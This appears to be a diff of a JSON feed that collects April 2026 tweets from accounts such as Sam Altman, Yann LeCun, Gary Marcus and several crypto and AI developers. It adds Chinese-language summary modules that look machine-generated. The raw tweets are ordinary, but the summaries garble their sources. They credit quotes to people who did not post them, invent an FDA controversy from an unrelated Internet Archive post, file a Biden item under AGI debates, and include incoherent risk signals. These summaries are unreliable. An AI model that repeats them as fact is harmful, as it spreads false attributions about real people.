"2026-04-09T17:11:58+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: New preprint: The Self Requires Learning. Self-consciousness requires continual learning + world-modeling. I introduce \"bounded integration\" to connect perspective, identity, and self-representation — and diagnose what current AI systems have and lack.", + "url": "https://nitter.net/mengyer/status/2041892448704622894#m", + "published_at": "2026-04-08T14:54:30+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Crypto analysis in 2024: The dog has a hat\n\nCrypto analysis in 2026: Strait of Hormuz, auto-translate from Farsi, tracking military movements via OSINT, oil futures backwardation", + "url": "https://nitter.net/CryptoCred/status/2041762832744694217#m", + "published_at": "2026-04-08T06:19:28+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "LLM not only made it harder to write, also made it harder to read. Once you knew it is done by a LLM for an opinion piece, you know it is uninteresting and you would better off to just ask LLM directly. It is harder to find a piece to read in its entirety these days.", + "url": "https://nitter.net/liuliu/status/2041577848620908756#m", + "published_at": "2026-04-07T18:04:24+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "New traders get told that they have to have specific 'setups'\n\nSo they spend all day back-testing some random price pattern and shove a couple of indicators in there for good measure, and then fire risk into the book as soon as it 'triggers' \n\nIn reality the vast majority of your returns as a crypto trader most likely won't be set up-driven but rather regime-driven\n\nMost of the time the market does mostly nothing\n\nAnd if you try to force your set ups in the wrong regime, then you'll just get bad results (e.g. momentum trading breakouts in a choppy market) \n\nSo I think the first useful port of call is at least some broad sense of what type of regime the market is in \n\nThis doesn't need to be complicated: you can just look at the chart, use some basic moving averages or even common sense to get an understanding of trending, mean-reverting, momentum, catalyst-based, volatility compression/expansion etc (complexity can be layered in later if required)\n\nEach regime should then have specific playbooks or set ups associated with it \n\nFor example if the market is trending then you might adjust to trade shallower pullbacks, lower time frames, faster moving averages, less drastic momentum resets etc.\n\nThat same so-called set up would get you absolutely cooked in a choppy market\n\nIn other words the super TLDR is that the correct hierarchy is:\n\n1. Regime is the first filter\n2. Setup is tied to the regime\n3. Execution nuances\n\nAs a practical example: \n\nThe current regime is technically defined as \"soul-crushing dogshit\" so the correct setup is to develop a nicotine and video game addiction \n\nHope this helps", + "url": "https://nitter.net/CryptoCred/status/2041437242799902933#m", + "published_at": "2026-04-07T08:45:41+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: It really bugs me", + "url": "https://nitter.net/XxHerobrineJrxX/status/2041378590948986948#m", + "published_at": "2026-04-07T04:52:37+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Show some love to base M4.", + "url": "https://nitter.net/liuliu/status/2040997087320662033#m", + "published_at": "2026-04-06T03:36:40+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "SATOSHI OH MY HEART", + "url": "https://nitter.net/satoshibun/status/2040936354708631955#m", + "published_at": "2026-04-05T23:35:20+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: asTRO and meisTRO—\n#Dandysworld\n#Dollysfactory", + "url": "https://nitter.net/SnipeCap34/status/2040599580002435292#m", + "published_at": "2026-04-05T01:17:07+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 📢<ぴえん猫ぬいぐるみ 予約開始🥺\n\nアニメ『NEEDY GIRL OVERDOSE』より\n”ぴえん猫”がぬいぐるみとなって登場!\n色んな場所へぜひ一緒におでかけください🥺\n\n🎀ご予約はこちら\nhttps://online.aniplex.co.jp/itemDInljwhS.html", + "url": "https://nitter.net/aniplex_plus/status/2040461508497596862#m", + "published_at": "2026-04-04T16:08:28+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 蔓沢つた子個展\n『Vine Garden』の開催、ご来場、誠にありがとうございました!\n\n終わるのが本当に本当に寂しかったです😭\nまた素敵な機会をいただけるように漫画を描き続けていきたいと思います🌱\n\nキービジュ\nアフターを添えて🌸", + "url": "https://nitter.net/tsutako25/status/2040400983713550680#m", + "published_at": "2026-04-04T12:07:57+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "TechnicalRoundup is back.\n\nDonAlt and I have been trading crypto for 9+ years and have been doing some version of this show on and off for around 5 years (mostly off, sorry).\n\nIt's fun and different: lots of crypto history, PTSD trading memories, and occasionally useful trading insights.\n\nI like to think of it as the perfect show to listen to while you wait for your AI to finish its output.\n\nThanks to @krakenfx for hooking us up.\n\nhttps://youtu.be/2aWyTKw-V84", + "url": "https://nitter.net/CryptoCred/status/2040373108901568631#m", + "published_at": "2026-04-04T10:17:12+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "When getting more taste of training with quantized kernels, you would appreciate more of FP8 and skeptical more to FP4.", + "url": "https://nitter.net/liuliu/status/2040162699313852876#m", + "published_at": "2026-04-03T20:21:06+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: I love when you can see the influence from Free! (Makoharu & Sourin) in BL", + "url": "https://nitter.net/sskslov/status/2040080657175736513#m", + "published_at": "2026-04-03T14:55:06+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "An obvious but underappreciated fact:\n\nCrypto traders' high volatility tolerance can be a great source of edge\n\nIt doesn't feel like it when you're bagholding a shitcoin that's drifting to zero or trading a 2% range with 50x leverage just to feel something \n\nBut in the right context, the mental illness we've all acquired is almost certainly helpful \n\nFor example: \n\nNormies who passively invest in the stock market start panicking whenever there's a red candle and magically turn into traders at the worst possible time \n\nA small drawdown has people restructuring their entire portfolios even though most of the research basically says \"STFU and hold\" when it comes to passive investing\n\nBut if you've been in crypto long enough and you have a shred of discipline not to day trade your investments (especially outside of crypto) you're probably immune to those same drawdowns that make normies panic \n\nUnfortunately none of us have any money left for passive investing so I'll see you guys in the liquidations feed", + "url": "https://nitter.net/CryptoCred/status/2039995911384752540#m", + "published_at": "2026-04-03T09:18:21+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: This work from @voooooogel was pretty ground-breaking:\nhttps://vgel.me/posts/representation-engineering/", + "url": "https://nitter.net/jeremyphoward/status/2039880485036544422#m", + "published_at": "2026-04-03T01:39:41+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Wtf", + "url": "https://nitter.net/CryptoCred/status/2039795951095714268#m", + "published_at": "2026-04-02T20:03:46+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Vibe coding is more addictive than any video game ever made (if you know what you want to build).", + "url": "https://nitter.net/naval/status/2039617101221224858#m", + "published_at": "2026-04-02T08:13:05+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Day 5: https://releases.drawthings.ai/p/introducing-mediagenerationkit-hybrid", + "url": "https://nitter.net/liuliu/status/2039496823396769803#m", + "published_at": "2026-04-02T00:15:09+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Day 4: https://releases.drawthings.ai/p/metal-quantized-attention-pulling", + "url": "https://nitter.net/liuliu/status/2039144158917702114#m", + "published_at": "2026-04-01T00:53:47+00:00" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "The anti-AI coalition continues to maneuver to find arguments to slow down AI progress. If someone has a sincere concern about a specific effect of AI, for instance that it may lead to human extinction, I respect their intellectual honesty, even if I deeply disagree with their position. However, I am concerned about organizations that are surveying the public to find whatever messages will turn people against AI, and how the public reacts as these messages are spread by lobbyists or by politicians seeking to alarm constituents, companies pursuing regulatory capture or seeking to promote the power of their technology, and individuals seeking to gain attention or to profit by being provocative.\n\nA large study (link in original article below; h/t to the AI Panic blog) by a UK group tested different messages that are designed to raise alarm about AI. Their study found that saying AI will cause human extinction has largely failed. Doomsayers were pushing this argument a couple of years ago, and fortunately our community beat it back. But AI-enabled warfare and environmental concerns resonate better. We should be prepared for a flood of messages (which is already underway) arguing against AI on these grounds. Further, job loss and harm to children are messages that motivate people to act.\n\nTo be clear, I find AI-enabled warfare alarming; we need to continue serious efforts to monitor and mitigate the environmental impact of AI; any job losses are tragic and hurt individuals and families; and as a father, I hold dearly the importance of every child’s welfare. Each of these topics deserves serious attention and treatment with the greatest of care.\n\nBut when anti-AI propagandists take a one-sided view of complex issues to benefit their own organizations at the expense of the public at large — for instance, when big AI companies argue that AI is dangerous to block the free distribution of open source projects that compete with their offerings — then we all lose.\n\nFor example, public perception of data centers’ environmental impact is already far worse than the reality — data centers are incredibly efficient for the work they do, and hampering their buildout will hurt rather than help the environment. While job loss is a real problem, the “AI washing” of layoffs — in which businesses that had over-hired during the pandemic blame AI for recent layoffs, although AI hasn’t yet affected their operations — has led to overblown fears about the impact of AI on employment.\n\nUnfortunately, this sort of propaganda easily leads to regulations that create worse outcomes for everyone. For example, oil companies worked for years to create fear of nuclear energy. The result is that overblown concerns about the safety of nuclear power plants has stifled nuclear power development, leading to millions of premature deaths from air pollution that was caused by other energy sources and a massive increase in CO2 emissions. Let’s make sure overblown concerns about AI do not lead to a similar fate for the many people that would benefit from faster AI development.\n\nLast week, the White House proposed a national legislative framework for AI. A key component is a federal preemption framework to prevent a patchwork of state regulations that hamper AI development. I support this. \n\nAfter failing to gain traction at the federal level, a lot of anti-AI propaganda has shifted to the state level. If just one of the 50 states passes a law that limits AI in an unproductive way, it could lead to stifling AI development across all the states and potentially across the globe. The White House proposal rightfully respects each state’s rights to control its own zoning, how it enforces general laws to protect consumers, and how it uses AI. But if a state were to pass laws that limit AI development, federal rules would preempt the state law.\n\nThe White House proposal remains a proposal for now. However, if the U.S. Congress enacts it, it will clear the way for ongoing efforts to develop AI in beneficial ways.\n\nWhere do we go from here? Let’s support limiting applications — those that use AI, and those that don’t — that harm people. When the anti-AI coalition argues against AI, in addition to considering the merits of the argument, I consider whether their position is consistent and persuasive, or if they are just promoting whatever concerns they think will sway the public at a given moment. And, let’s also keep using a scientific approach to weighing AI’s benefits against likely harms, so we don’t end up with overblown concerns that limit the benefits that AI can bring everyone.\n\n[Original text with links: https://www.deeplearning.ai/the-batch/issue-346 ]", + "url": "https://nitter.net/AndrewYNg/status/2039051446084153834#m", + "published_at": "2026-03-31T18:45:23+00:00" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 208 + }, + { + "title": "模型能力", + "count": 55 + }, + { + "title": "交易与市场", + "count": 15 + }, + { + "title": "算力与芯片", + "count": 13 + }, + { + "title": "投融资与并购", + "count": 11 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "AI行业技术演进", + "subtitle": "GPT-5.5的广泛应用与迭代争议", + "bullets": [ + "OpenAI与微软延长合作至2032年并开放多云部署", + "GPT-5.5在代码生成、文档处理等场景加速落地(https://nitter.net/sama/status/2048757233174122827)" + ] + }, + { + "id": "t2", + "title": "数据安全隐患", + "subtitle": "X平台漏洞暴露与用户反馈闭环缺失", + "bullets": [ + "用户DM中大量出现伪造的Phishing攻击(https://nitter.net/GaryMarcus/status/2048553390540734479)", + "投票系统功能异常引发信任危机(https://nitter.net/GaryMarcus/status/2048578055283880296)" + ] + }, + { + "id": "t3", + "title": "AGI路线分歧", + "subtitle": "从LLM到通用智能的技术哲学碰撞", + "bullets": [ + "LeCun质疑纯生成式架构无法达到猫级智能(https://nitter.net/AYi_AInotes/status/2048037985765949537)", + "Biden任期对科技产业影响的政治理性讨论(https://nitter.net/briantylercohen/status/2048118689258487857)" + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "OpenAI核心架构调整", + "meta": "2026-04-27", + "summary": "微软仍为OpenAI主要云合作伙伴,GPT-5.5正式支持多云部署。(https://nitter.net/sama/status/2048755148361707946)" + }, + { + "id": "p02", + "title": "Codex研究突破", + "meta": "2026-04-26", + "summary": "GPT-5.5在科研实验自动化处理中展现资质,可执行整晚的算法迭代。(https://nitter.net/tszzl/status/2048399674059024615)" + }, + { + "id": "p03", + "title": "FDA政策争议", + "meta": "2026-04-26", + "summary": "FDA局长批评毒性前文删除建议引发自由表达争论,6000+推文已被归档保存。(https://nitter.net/internetarchive/status/2048069805807128734)" + }, + { + "id": "p04", + "title": "AI安全警告", + "meta": "2026-04-25", + "summary": "风险资本溢价可能形成泡沫,AI代理系统被过度商业化。(https://nitter.net/GaryMarcus/status/2048757233174122827)" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "生成式AI就像自动驾驶汽车——不需每次检查每辆车零件,但系统层面需要井然有序的安全架构。", + "speaker": "Yann LeCun", + "date": "2026-04-26", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734" + }, + { + "id": "q2", + "quote": "将生成式输出视作代码产品的潮流,正在摧毁数十年来建立的软件可靠工程范式。", + "speaker": "Gary Marcus", + "date": "2026-04-27", + "url": "https://nitter.net/atmoio/status/2048608025464705084" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI云服务动态", + "subtitle": "基础架构合作与开放策略", + "level": "P0", + "items": [ + { + "text": "NVIDIA合作部署Codex全公司级方案", + "url": "https://nitter.net/sama/status/2048118689258487857" + }, + { + "text": "OpenAI公布API安全评估体系", + "url": "https://nitter.net/bobabowen/status/2048224374264885396" + } + ] + }, + { + "id": "c2", + "title": "生成式AI风险", + "subtitle": "系统性设计缺陷与误用", + "level": "WARN", + "items": [ + { + "text": "AI生成回复自动化劳动中的隐私泄露隐患", + "url": "https://nitter.net/paulg/status/2048413578789634100" + }, + { + "text": "开发者对AI不可靠性的产业预警", + "url": "https://nitter.net/SteveStricklan6/status/2048580123915570286" + } + ] + }, + { + "id": "c3", + "title": "机器人技术前沿", + "subtitle": "工业实践与测试突破", + "level": "P1", + "items": [ + { + "text": "双机械臂轮式人形机器人开启商业验证", + "url": "https://nitter.net/Ronald_vanLoon/status/2048751798735835629" + }, + { + "text": "多模态运载系统可跨越轮/腿/飞行器形态转换", + "url": "https://nitter.net/Ronald_vanLoon/status/2048716491537650168" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "生成式AI的生产危机", + "detail": "开发者社区对工具链临时数据擦除风险持续模糊认知边界" + }, + { + "id": "r2", + "level": "MID", + "title": "科层制平台垄断", + "detail": "条评论系统通过用户行为数据循环强化现有权力结构" + }, + { + "id": "r3", + "level": "OPP", + "title": "边缘微创新机遇", + "url": "https://nitter.net/DennisonBertram/status/2047392357482639749" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T13:42:08.196749+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近30天\n**账号总数**: 33 | **成功获取**: 18 | **推文总数**: 302\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://nitter.net/sama/status/2048755148361707946#m)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://nitter.net/sama/status/2048751392031203544#m)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://nitter.net/sama/status/2048554097985593849#m)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://nitter.net/sama/status/2048552677433643427#m)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://nitter.net/sama/status/2048428561481265539#m)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://nitter.net/sama/status/2048426122854228141#m)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://nitter.net/SebastienBubeck/status/2048224374264885396#m)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://nitter.net/sama/status/2048165186482389253#m)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://nitter.net/sama/status/2048160448340767038#m)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://nitter.net/sama/status/2048160404376105179#m)\n\n**[2026-04-25T15:31:08+00:00]**\n> 5.5 is so earnest \"little engine that could\" energy\n[原文链接](https://nitter.net/sama/status/2048062261584077149#m)\n\n**[2026-04-24T23:41:49+00:00]**\n> this was a good week. proud of the team. happy building!\n[原文链接](https://nitter.net/sama/status/2047823357635354814#m)\n\n**[2026-04-24T21:17:51+00:00]**\n> GPT-5.5 and GPT-5.5 Pro are now available in the API!\n[原文链接](https://nitter.net/sama/status/2047787124846653895#m)\n\n**[2026-04-24T14:27:13+00:00]**\n> 🫶\n[原文链接](https://nitter.net/sama/status/2047683787828703289#m)\n\n**[2026-04-24T00:33:16+00:00]**\n> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor…\n[原文链接](https://nitter.net/bobabowen/status/2047473914528563592#m)\n\n**[2026-04-23T19:54:32+00:00]**\n> \"don't retweet this, don't retweet this, don't retweet this...\" ah fuck it, life imitates art.\n[原文链接](https://nitter.net/sama/status/2047403771416940715#m)\n\n**[2026-04-23T19:21:55+00:00]**\n> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company!\n[原文链接](https://nitter.net/sama/status/2047395562501411058#m)\n\n**[2026-04-23T19:09:11+00:00]**\n> embers\n[原文链接](https://nitter.net/sama/status/2047392357482639749#m)\n\n**[2026-04-23T18:47:43+00:00]**\n> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up …\n[原文链接](https://nitter.net/tszzl/status/2047386955550470245#m)\n\n**[2026-04-23T18:26:18+00:00]**\n> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy!\n[原文链接](https://nitter.net/ajambrosino/status/2047381565534322694#m)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ⚠️ @andrejkarpathy — Andrej Karpathy(获取失败)\n\n- 错误: URLError: \n\n### ✅ @ylecun — Yann LeCun(20 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://nitter.net/briantylercohen/status/2048469956627468510#m)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://nitter.net/Gianl1974/status/2048453901930660058#m)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://nitter.net/ylecun/status/2048399621492236615#m)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://nitter.net/PhillyInquirer/status/2048118689258487857#m)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://nitter.net/internetarchive/status/2048069805807128734#m)\n\n**[2026-04-24T20:50:37+00:00]**\n> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53…\n[原文链接](https://nitter.net/Strandjunker/status/2047780272297382384#m)\n\n**[2026-04-24T19:31:52+00:00]**\n> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what \"goo…\n[原文链接](https://nitter.net/ziv_ravid/status/2047760455679246500#m)\n\n**[2026-04-24T17:45:08+00:00]**\n> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in …\n[原文链接](https://nitter.net/internetarchive/status/2047733594064408894#m)\n\n**[2026-04-24T15:23:18+00:00]**\n> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能…\n[原文链接](https://nitter.net/AYi_AInotes/status/2047697898989572176#m)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://nitter.net/ihtesham2005/status/2047680485208531152#m)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://nitter.net/Discoplomacy/status/2047676640059154653#m)\n\n**[2026-04-24T11:19:36+00:00]**\n> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th…\n[原文链接](https://nitter.net/ylecun/status/2047636569767419951#m)\n\n**[2026-04-24T10:30:09+00:00]**\n> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI…\n[原文链接](https://nitter.net/ELLISforEurope/status/2047624126047670758#m)\n\n**[2026-04-24T06:38:08+00:00]**\n> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabi…\n[原文链接](https://nitter.net/cginisty/status/2047565736382534091#m)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://nitter.net/maddenifico/status/2047454244781818205#m)\n\n**[2026-04-23T18:12:46+00:00]**\n> RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️ Read for free or purchase in print ➡️ https://archive.org/details/vanishing-cultu…\n[原文链接](https://nitter.net/internetarchive/status/2047378161860776085#m)\n\n**[2026-04-23T14:27:57+00:00]**\n> RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear desi…\n[原文链接](https://nitter.net/Weinsteinlaw/status/2047321581966291154#m)\n\n**[2026-04-08T14:54:30+00:00]**\n> RT by @ylecun: New preprint: The Self Requires Learning. Self-consciousness requires continual learning + world-modeling. I introduce \"bounded integration\" to connect perspective, identity, and self-…\n[原文链接](https://nitter.net/mengyer/status/2041892448704622894#m)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(19 条)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://nitter.net/GaryMarcus/status/2048757233174122827#m)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://nitter.net/GaryMarcus/status/2048746152749846549#m)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://nitter.net/GaryMarcus/status/2048742983684784239#m)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://nitter.net/GaryMarcus/status/2048739005525877072#m)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://nitter.net/atmoio/status/2048608025464705084#m)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://nitter.net/GaryMarcus/status/2048593283639894520#m)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048589239915577837#m)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://nitter.net/suchenzang/status/2048582672163995766#m)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment somethin…\n[原文链接](https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m)\n\n**[2026-04-27T01:44:47+00:00]**\n> RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.\n[原文链接](https://nitter.net/FrankRundatz/status/2048579079121555764#m)\n\n**[2026-04-27T01:40:43+00:00]**\n> the difference is that we don’t *hype* giving 12 year-olds bulldozers. *of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point. …\n[原文链接](https://nitter.net/GaryMarcus/status/2048578055283880296#m)\n\n**[2026-04-27T01:09:02+00:00]**\n> RT by @GaryMarcus: Never ever use generative AI for anything critical. The technology is probablistic all the way down and therefore inherently unreliable. Why is this so hard to understand? It’s wil…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048570082843082905#m)\n\n**[2026-04-27T01:00:07+00:00]**\n> Generative AI as the Hindenberg\n[原文链接](https://nitter.net/GaryMarcus/status/2048567837221089669#m)\n\n**[2026-04-27T00:25:00+00:00]**\n> Is it me or X starting to look like a vibe coded mess? Polls are broken. Accounts are getting hacked. My DMs are full of phishing scams. Basics that used to work no longer work.\n[原文链接](https://nitter.net/GaryMarcus/status/2048558998325166498#m)\n\n**[2026-04-27T00:02:43+00:00]**\n> R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:\n[原文链接](https://nitter.net/GaryMarcus/status/2048553390540734479#m)\n\n**[2026-04-27T00:00:53+00:00]**\n> Total AI disaster, totally predictable\n[原文链接](https://nitter.net/GaryMarcus/status/2048552931923013916#m)\n\n**[2026-04-26T23:29:20+00:00]**\n> Coders and software engineers ONLY:\n[原文链接](https://nitter.net/GaryMarcus/status/2048544989769257024#m)\n\n**[2026-04-26T20:33:49+00:00]**\n> getting so much phishing email in my X DMs. either a lot of accounts have been hacked or someone has discovered a back door to posting DMs.\n[原文链接](https://nitter.net/GaryMarcus/status/2048500820350750905#m)\n\n**[2026-04-26T17:29:05+00:00]**\n> RT by @GaryMarcus: The only people who believe any of this are non-coders. I tried to build a game (an area I’m an n00b in.) The results are amusingly disastrous - I never before coded a decent 